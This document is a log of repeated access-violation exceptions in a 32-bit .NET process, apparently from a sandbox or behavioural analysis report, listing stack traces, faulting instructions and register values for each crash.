__exception__ Oct. 16, 2023, 9:44 a.m.	stacktrace: 0x7cc13d 0x7cbf0e 0x7c6cad 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7cc278 registers.esp: 3206164 registers.edi: 3206216 registers.eax: 0 registers.ebp: 3206228 registers.edx: 4930320 registers.ebx: 3207436 registers.esi: 40778344 registers.ecx: 0	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7734470 0x7730580 0x7cfa69 0x7cf985 0x7ce08b 0x7cd34e 0x7cc7af 0x7c6d75 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x77344b3 registers.esp: 3204752 registers.edi: 3205036 registers.eax: 0 registers.ebp: 3204760 registers.edx: 0 registers.ebx: 3207436 registers.esi: 41273380 registers.ecx: 42399692	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7734470 0x7730580 0x7cfa69 0x7cf99d 0x7ce08b 0x7cd34e 0x7cc7af 0x7c6d75 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x77344b3 registers.esp: 3204752 registers.edi: 3205036 registers.eax: 0 registers.ebp: 3204760 registers.edx: 0 registers.ebx: 3207436 registers.esi: 41273380 registers.ecx: 43705632	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7734470 0x7730580 0x7cfa69 0x7cf99d 0x7ce08b 0x7cd34e 0x7cc7af 0x7c6d75 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x77344b3 registers.esp: 3204752 registers.edi: 3205036 registers.eax: 0 registers.ebp: 3204760 registers.edx: 0 registers.ebx: 3207436 registers.esi: 41273380 registers.ecx: 41145688	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7734470 0x7730580 0x7734e08 0x7cf985 0x7ce520 0x7cd34e 0x7cc7af 0x7c6d75 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x77344b3 registers.esp: 3204752 registers.edi: 3205036 registers.eax: 0 registers.ebp: 3204760 registers.edx: 0 registers.ebx: 3207436 registers.esi: 40355360 registers.ecx: 42621568	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7734470 0x7730580 0x7734e08 0x7cf99d 0x7ce520 0x7cd34e 0x7cc7af 0x7c6d75 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x77344b3 registers.esp: 3204752 registers.edi: 3205036 registers.eax: 0 registers.ebp: 3204760 registers.edx: 0 registers.ebx: 3207436 registers.esi: 40355360 registers.ecx: 44254960	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7734470 0x7730580 0x7734e08 0x7cf99d 0x7ce520 0x7cd34e 0x7cc7af 0x7c6d75 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x77344b3 registers.esp: 3204752 registers.edi: 3205036 registers.eax: 0 registers.ebp: 3204760 registers.edx: 0 registers.ebx: 3207436 registers.esi: 40355360 registers.ecx: 45559560	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7734470 0x7735676 0x77350c8 0x7cf985 0x7ce803 0x7cd34e 0x7cc7af 0x7c6d75 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x77344b3 registers.esp: 3204712 registers.edi: 3205052 registers.eax: 0 registers.ebp: 3204720 registers.edx: 0 registers.ebx: 3207436 registers.esi: 40355360 registers.ecx: 40385368	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7734470 0x7735676 0x77350c8 0x7cf99d 0x7ce803 0x7cd34e 0x7cc7af 0x7c6d75 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x77344b3 registers.esp: 3204712 registers.edi: 3205052 registers.eax: 0 registers.ebp: 3204720 registers.edx: 0 registers.ebx: 3207436 registers.esi: 40353204 registers.ecx: 41650768	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7734470 0x7735676 0x77350c8 0x7cf99d 0x7ce803 0x7cd34e 0x7cc7af 0x7c6d75 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x77344b3 registers.esp: 3204712 registers.edi: 3205052 registers.eax: 0 registers.ebp: 3204720 registers.edx: 0 registers.ebx: 3207436 registers.esi: 40353204 registers.ecx: 43000440	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7734470 0x7735d3a 0x7735918 0x7cf985 0x7ce905 0x7cd34e 0x7cc7af 0x7c6d75 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x77344b3 registers.esp: 3204776 registers.edi: 3205052 registers.eax: 0 registers.ebp: 3204784 registers.edx: 0 registers.ebx: 3207436 registers.esi: 40353204 registers.ecx: 44350176	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7734470 0x7735d3a 0x7735918 0x7cf99d 0x7ce905 0x7cd34e 0x7cc7af 0x7c6d75 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x77344b3 registers.esp: 3204776 registers.edi: 3205052 registers.eax: 0 registers.ebp: 3204784 registers.edx: 0 registers.ebx: 3207436 registers.esi: 40353204 registers.ecx: 41108520	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7734470 0x7735d3a 0x7735918 0x7cf99d 0x7ce905 0x7cd34e 0x7cc7af 0x7c6d75 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x77344b3 registers.esp: 3204776 registers.edi: 3205052 registers.eax: 0 registers.ebp: 3204784 registers.edx: 0 registers.ebx: 3207436 registers.esi: 40353204 registers.ecx: 42506712	1
__exception__ Oct. 16, 2023, 9:45 a.m.	stacktrace: 0x7734470 0x7736242 0x7735e68 0x7cf985 0x7ce9f2 0x7cd34e 0x7cc7af 0x7c6d75 0x7c6886 0x7c34ab 0x7c2f10 0x7c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x77344b3 registers.esp: 3204796 registers.edi: 3205052 registers.eax: 0 registers.ebp: 3204804 registers.edx: 0 registers.ebx: 3207436 registers.esi: 40353204 registers.ecx: 43904984	1
